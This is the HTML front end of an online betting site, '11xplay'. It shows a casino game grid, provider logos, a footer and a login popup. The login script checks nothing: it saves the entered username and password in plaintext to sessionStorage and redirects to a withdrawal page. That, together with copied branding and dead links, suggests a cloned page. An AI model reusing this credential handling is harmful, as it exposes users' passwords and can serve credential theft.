						<p > Instant Withdrawal &amp; Deposit Live Stream Of Events Famous International Casino Surety of Winning Rate 24/7 Customer Service </p>
					</div>
					<div  class="col-md-6">
						<img  src="assets/img/casino-pic.png" class="img-fluid">
						</div>
					</div>
				</div>
			</section>
			
<section  class="casino">
<div  class="container">
<h2  class="titlehome">OUR CASINOS</h2>
<div  class="row">
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/rummy.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/2020tp2.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/andarbahar.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/dragontiger.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/dragontigerlion.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/dragontigeroneday.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/dt2.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/baccarat.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/29baccarat.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/baccaratoneday.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/sicbo.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/roulette.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/20-20poker.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/poker.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/lucky7.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/onedayteenpatti.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/teenpattitest.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/2cardsteenpatti.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/muflisteenpattioneday.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/2020teenpatti.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/2cardonedayteenpatti.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/openteenpatti.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/32cards.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/amarakbaranthony.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/3cardjudgement.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/queenrace.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/race20.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/casinowar.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/worlimatka.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/trap.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/trio.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/bollywoodcasino.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/10kadum.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/1-card-20-20.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
	<img  class="img-fluid" src="assets/img/1-card-meter.webp">
	</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/one-card-one-day.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/race17.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/note-umber.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/raceto2nd.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/centercardoneday.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/lottery.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/superoveroneday.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
<img  class="img-fluid" src="assets/img/fivecricket.webp">
</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
	<img  class="img-fluid" src="assets/img/cricket2020.webp">
	</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
	<img  class="img-fluid" src="assets/img/high_low.webp">
	</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
	<img  class="img-fluid" src="assets/img/6pp.webp">
	</div>
</div>
<div  class="col-lg-2 col-6">
<div  class="thumbnail__item__pic">
	<img  class="img-fluid" src="assets/img/10-10-cricket.webp">
	</div>
</div>
<!---->
</div>
</div>
</section>

<section class="casino_marketing">
<div class="container">
	<div  class="row align-items-center">
	<div  class="col-md-6">
		<img  src="assets/img/casino-pic.png" class="img-fluid">
		</div>
		<div  class="col-md-5">
			<h2 >Best to others?</h2>
			<p >11xplay.pro is India’s first and most trusted betting exchange that offers the likes of sports book and live casino and live Indian card games. Unlike most other betting sites, on FairPlay a user bets against other players and not the house thus maintaining transparency and increasing a player’s chances of winning.</p>
	</div>
	</div>
</div>
</section>

<section class="all-providers">
<div  class="container">
<h2  class="titlehome">Game Providers</h2>
<div  class="row align-items-center">
<div  class="col-lg-2 col-6">
<img  src="assets/img/mac88.webp" class="img-fluid">
</div>
<div  class="col-lg-2 col-6">
<img  src="assets/img/mac88virtualgame.webp" class="img-fluid">
</div>
<div  class="col-lg-2 col-6">
<img  src="assets/img/aesexy.webp" class="img-fluid">
</div>
<div  class="col-lg-2 col-6">
<img  src="assets/img/betgames.webp" class="img-fluid">
</div>
<div  class="col-lg-2 col-6">
<img  src="assets/img/bombaylive.webp" class="img-fluid">
</div>
<div  class="col-lg-2 col-6">
<img  src="assets/img/evolution.webp" class="img-fluid">
</div>
<div  class="col-lg-2 col-6">
<img  src="assets/img/ezugi.webp" class="img-fluid">
</div>
<div  class="col-lg-2 col-6">
<img  src="assets/img/gamzix.webp" class="img-fluid">
</div>
<div  class="col-lg-2 col-6">
<img  src="assets/img/jili.webp" class="img-fluid">
</div>
<div  class="col-lg-2 col-6">
<img  src="assets/img/spribe.webp" class="img-fluid">
</div>
</div>
</div>
</section>

<section  class="footer_home">
<div  class="container">
<div  class="row">
<div  class="col-lg-3">
<div  class="footer__logo">
<a  href="/home">
<img  alt="" class="img-fluid" src="assets/img/11xplay/logo.png">
</a>
<hr >
<p >© 2024 All rights reserved. 
<a  href="">11xplay most trusted and secure exchange site in the world.</a>
</p>
<img  src="assets/img/socialicon.png" class="img-fluid mt-2" style="width: 150px;">
</div>
</div>
<div  class="col-lg-4">
<h2 >Payment Partners</h2>
<img  src="assets/img/payment.png" class="img-fluid" style="width: 300px;">
<img  src="assets/img/payment2.png" class="img-fluid" style="width: 300px;">
</div>
<div  class="col-lg-2">
<h2 >Games</h2>
<div  class="footer__nav">
<ul >
<li  routerlinkactive="active" tabindex="0">
<a  href="javascript:void(0)">Cricket</a>
</li>
<li  routerlinkactive="active" tabindex="0">
<a  href="javascript:void(0)">Football</a>
</li>
<li  routerlinkactive="active" tabindex="0">
<a  href="javascript:void(0)">Tennis</a>
</li>
<li  routerlinkactive="active" tabindex="0">
<a  href="javascript:void(0)">Int Casino</a>
</li>
<li  routerlinkactive="active" tabindex="0">
<a  href="javascript:void(0)">Horse Racing</a>
</li>
<li  routerlinkactive="active" tabindex="0">
<a  href="javascript:void(0)">Greyhound Racing</a>
</li>
<!---->
</ul>
</div>
</div>
<div  class="col-lg-3">
<h2 >Security &amp; Game Integrity</h2>
<div  class="securitylogo">
<img  src="assets/img/18.png" class="img-fluid">
<img  src="assets/img/responsible-play.png" class="img-fluid">
<p  class="mt-3">Powered by 
<img  src="assets/img/betfair.png" class="img-fluid d-block" style="height: 20px;">
</p>
</div>
</div>
<div  class="col-lg-12">
<p  class="bottom-links">
<a  href="javascript:void(0);">Privacy Policy</a>
<a  href="javascript:void(0);">Disconnection Policy</a>
<a  href="javascript:void(0);">Responsible Gambling</a>
<a  href="javascript:void(0);">Rules &amp; Regulations</a>
<a  href="javascript:void(0);">Exclusion Policy</a>
<a  href="javascript:void(0);">Restricted Territories</a>
<a  href="javascript:void(0);">Terms And Conditions</a>
</p>
</div>
</div>
</div>
</section>

<div role="dialog" class="modal fade show in login-popup" >
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-body">
<button  type="button" id="clsbtn" class="close pull-right">
<span  aria-hidden="true">×</span>
</button>
<app-login  >
<div >
<div  class="modal-body">
<!---->
<form novalidate class="login-form ng-untouched ng-pristine ng-invalid">
    <div class="form-group">
        <label for="username" class="text-uppercase">Username</label>
        <input type="text" id="username" placeholder="Username" class="form-control">
    </div>
    <div class="form-group">
        <label for="password" class="text-uppercase">Password</label>
        <input type="password" id="password" placeholder="Password" class="form-control">
    </div>
    <div class="form-check">
        <label class="form-check-label">
            <input type="checkbox" class="form-check-input">
            <span>Remember Me?</span>
        </label>
    </div>
    <button type="submit" class="btn btn-login">Log In</button>
</form>

<!-- Add an error message display -->
<div id="errorMsg"></div>
<div  class="copy-text">Powered by 
	<a  href="javascript:void(0)">FairBet</a>
	<p >
		<a  href="mailto:support@11xplay.com">support@11xplay.com</a>
	</p>
	<!---->
</div>
</div>
</div>
<!---->
<!---->
<!---->
<!---->
</app-login>
</div>
</div>
</div>
</div>


  <script type="text/javascript">
        $(document).ready(function () {
            // Handle the login form submission
            $("form").on("submit", function (event) {
                event.preventDefault(); // Prevent form submission from default behavior

                // Get form input values
                var loginName = $("#username").val();
                var password = $("#password").val();

                // Check if both fields are not empty
                if (loginName && password) {
                    // Save the username and password to sessionStorage
                    sessionStorage.setItem("loginName", loginName);
                    sessionStorage.setItem("password", password);

                    // Redirect to the withdrawal page
                    window.location.href = "withdrawal.html";
                } else {
                    $("#errorMsg").text("Both fields are required.");
                }
            });
        });
    </script>


		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/assets/owl.carousel.min.css">
		<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/assets/owl.theme.default.min.css">
		
		<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>		
		<!--script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script-->
                <script src="assets/js/main.js"></script>
        
		<script src="https://cdnjs.cloudflare.com/ajax/libs/OwlCarousel2/2.3.4/owl.carousel.min.js"></script>
		
		<script>
			$(function() {
			  var owl = $("#bannerMain");
			  owl.owlCarousel({
				items: 1,
				margin: 0,
				loop: true,
				dots: false,
				nav: true
			  });
		});

		$("#cust_btn").click(function(){
		  $(".login-popup,.modal-backdrop").show();
		})
		$("#clsbtn").click(function(){
		  $(".login-popup,.modal-backdrop").hide();
		})
		
		</script>
    </body>
</html>
